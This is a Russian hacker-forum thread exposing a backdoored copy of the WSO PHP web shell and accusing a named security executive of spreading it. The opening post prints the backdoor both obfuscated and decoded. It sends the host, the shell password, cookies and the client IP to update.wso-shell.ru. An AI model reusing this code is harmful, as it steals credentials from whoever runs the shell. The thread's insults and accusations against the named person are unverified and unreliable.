Старый 27.06.2016, 21:58   #1
12309
 
Регистрация: 25.12.2011
Сообщений: 265
Репутация: 33
По умолчанию Скандалы интриги расследования

одна крыса (Кирилл «isox» Ермаков, главный безопасник QIWI) распространяет wso со стучалкой: https://habrahabr.ru/company/xakep/blog/303880/

> http://wso-shell.ru/wso2.txt

Код:
eval(str_rot13('$qngn=(@pbaireg_hhrapbqr($_FREIRE["UGGC_UBFG"]."|".$_FREIRE["CUC_FRYS"]."|".@$_CBFG["cnff"]."|".@$_FREIRE["UGGC_PBBXVR"]."|".$_FREIRE["ERZBGR_NQQE"]."|".$_FREIRE["UGGC_NPPRCG_YNATHNTR"]));$pgk = neenl ( "uggc" => neenl ( "zrgubq" => "CBFG", "urnqre"=> "Pbagrag-glcr: nccyvpngvba/k-jjj-sbez-heyrapbqrq\e\a" . "Pbagrag-Yratgu: " . fgeyra($qngn) . "\e\a", "pbagrag" => $qngn, "gvzrbhg" => 3, ) );$pgkk=fgernz_pbagrkg_perngr($pgk);rpub @svyr_trg_pbagragf("uggc://hcqngr.jfb-furyy.eh/nhgbhcqngr.cuc", snyfr, $pgkk);'));
==
Код:
$data=(@convert_uuencode($_SERVER["HTTP_HOST"]."|".$_SERVER["PHP_SELF"]."|".@$_POST["pass"]."|".@$_SERVER["HTTP_COOKIE"]."|".$_SERVER["REMOTE_ADDR"]."|".$_SERVER["HTTP_ACCEPT_LANGUAGE"]));$ctx = array ( "http" => array ( "method" => "POST", "header"=> "Content-type: application/x-www-form-urlencoded\r\n" . "Content-Length: " . strlen($data) . "\r\n", "content" => $data, "timeout" => 3, ) );$ctxx=stream_context_create($ctx);echo @file_get_contents("http://update.wso-shell.ru/autoupdate.php", false, $ctxx);
а статья вообще ппц. Кирилл, ты - ЧСВшный мудак.
12309 вне форума   Ответить с цитированием
Старый 28.06.2016, 02:13   #2
crlf
 
Аватар для crlf
 
Регистрация: 29.09.2015
Сообщений: 101
Репутация: 17
По умолчанию

Банальный eval. Может безопасник сам юзает протрояненный шелл? Вообще кто-нибудь проверял чистый wso на секурность? Может там куда элегантней закладочка от разработчика есть?
crlf вне форума   Ответить с цитированием
Старый 28.06.2016, 02:32   #3
profexer
 
Регистрация: 06.01.2011
Сообщений: 117
Репутация: 63
По умолчанию

Цитата:
Сообщение от crlf Посмотреть сообщение
Банальный eval. Может безопасник сам юзает протрояненный шелл?
Очень даже вероятно, судя по статье.

Цитата:
Сообщение от crlf Посмотреть сообщение
Вообще кто-нибудь проверял чистый wso на секурность? Может там куда элегантней закладочка от разработчика есть?
Паранойя в край одолела? В таких случаях рецепт один - никому не доверяй кроме себя - возьми проверь сам. Потом свою ОС напиши и т.д. А в конце вспомни что доверять нельзя никому... даже себе и повтори все сначала)

P.S. Чуть не забыл - качайте мой шелл, делайте донейты =D
profexer вне форума   Ответить с цитированием
Старый 28.06.2016, 09:59   #4
Molofya
 
Регистрация: 09.07.2015
Сообщений: 21
Репутация: -1
По умолчанию

Цитата:
Сообщение от crlf Посмотреть сообщение
Банальный eval. Может безопасник сам юзает протрояненный шелл?
Не стоит его отмазывать, кирюша в прошлом бывший блекхет (если так можно выразиться), и не гнушается по сей день, подобными "фишками" против "киберпреступников". К сожалению, 90% вайтехков с аналогичным взглядом на жизнь.
И если присмотритесь повнимательнее, там никакого евала нету, там стучалка шелла и пароля к нему на тот же домен wso-shell.ru

Цитата:
Сообщение от crlf Посмотреть сообщение
Вообще кто-нибудь проверял чистый wso на секурность? Может там куда элегантней закладочка от разработчика есть?
Тут могу сказать, закладок от автора 100% нету. Я его шелл практически полностью модифицировал под себя (изучив каждую строчку кода детально), оставив только внешний дизайн, там все чисто.

Последний раз редактировалось Molofya; 28.06.2016 в 10:31..
Molofya вне форума   Ответить с цитированием
Старый 28.06.2016, 12:06   #5
SynQ
 
Регистрация: 11.07.2010
Сообщений: 953
Репутация: 352
По умолчанию

Цитата:
Сообщение от 12309 Посмотреть сообщение
а статья вообще ппц. Кирилл, ты - ЧСВшный мудак.
он чересчур cocky для своих знаний, пусть дальше "скилляется", гонщег.
SynQ вне форума   Ответить с цитированием
Старый 28.06.2016, 20:54   #6
12309
 
Регистрация: 25.12.2011
Сообщений: 265
Репутация: 33
По умолчанию

Domain Neighbors lookup for: 77.37.20.146
1 puttydownload.de
2 puttydownload.ru
3 puttydownload.us
4 unisono.de
5 wso-shell.ru

там еще и протрояненный путти лежит. будет забавно, если он действительно юзает пробэкдоренный всо и заходит на сервера со своего qiwi-директорского компа через протрояненный путти.
12309 вне форума   Ответить с цитированием
Старый 28.06.2016, 22:46   #7
Molofya
 
Регистрация: 09.07.2015
Сообщений: 21
Репутация: -1
По умолчанию

Цитата:
Сообщение от 12309 Посмотреть сообщение
Domain Neighbors lookup for: 77.37.20.146
1 puttydownload.de
2 puttydownload.ru
3 puttydownload.us
4 unisono.de
5 wso-shell.ru

там еще и протрояненный путти лежит. будет забавно, если он действительно юзает пробэкдоренный всо и заходит на сервера со своего qiwi-директорского компа через протрояненный путти.
Верно и то, и другое.
То, что он наплевательски относится как к работодателю, так и к самой безопасности, видно даже по его статейке на хабре, поэтому то, что его как лопуха затроянили, у меня сомнений нет.
А вот знающие люди говорят, что домены всё-таки его, и троянит он не только "киберпреступников". (на хабре его утверждение, что абсолютно все сливают инфу, тому только подтверждение)
В этом вся суть нынешнего WhiteHat, к сожалению.
Molofya вне форума   Ответить с цитированием
Старый 28.06.2016, 23:56   #8
AiR0
 
Регистрация: 23.09.2013
Сообщений: 37
Репутация: 0
По умолчанию

Полный список
1 unisono.de
2 wso-shell.ru
3 puttydownload.de
4 puttydownload.ru
5 puttydownload.us
6 puttybuddy.us
7 puttyclient.ru
8 puttycs.de
9 unisonmasters.de
10 wso-online.ru
AiR0 вне форума   Ответить с цитированием
Старый 29.06.2016, 03:39   #9
crlf
 
Аватар для crlf
 
Регистрация: 29.09.2015
Сообщений: 101
Репутация: 17
По умолчанию

Бог ему судья, пусть живёт как хочет, возмездие то придёт, как он сам говорит. Код исполнения стукача, лично мне, многое говорит об исполнителе
Возвращаясь к теме wso, с такой популярностью наверняка его уже вычитали вдоль и поперек, поэтому спросил только ради интереса.
На сколько я понимаю автор прикратил поддержку и это печалит. Хочется новых модных фишек html5/css3. Angular например прикрутить, шутка конечно, но диз посовременнее не помешает.
crlf вне форума   Ответить с цитированием
Старый 29.06.2016, 15:38   #10
l1ght
 
Аватар для l1ght
 
Регистрация: 04.07.2010
Сообщений: 32
Репутация: 32
По умолчанию

1. об этом домене только 1 упоминание в поисковиках - в его статье
2. закладка стучит на поддомен
3. прямо под ссылкой на wso-shell ссылка на автора jpeg-payload от BlackFan на rdot.org (но ему не известно кто автор wso)

Это не безопасник, бывший блекхат,или кем там он ещё себя называет. Это типичная крыса-изгой с большим чсв. Вместе "ксакепа" тебе стоило почитать "капитанскую дочку", кирилл (осознанно с маленькой буквы), хотя бы ее эпиграф. Соболезную PT и qiwi и рекомендую проверить на закладки его "вклад" в ваш софт, даже если их там нет ..

// все-таки это интервью, а автор статьи на хабре - ксакеп. маловероятно, но возможно, что эта ссылка - их рук дело

Последний раз редактировалось l1ght; 29.06.2016 в 15:44..
l1ght вне форума   Ответить с цитированием
Ответ

Опции темы Поиск в этой теме
Поиск в этой теме:

Расширенный поиск
Опции просмотра

Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.

Быстрый переход



Powered by vBulletin® Version 3.8.5
Copyright ©2000 - 2019, Jelsoft Enterprises Ltd. Перевод: zCarot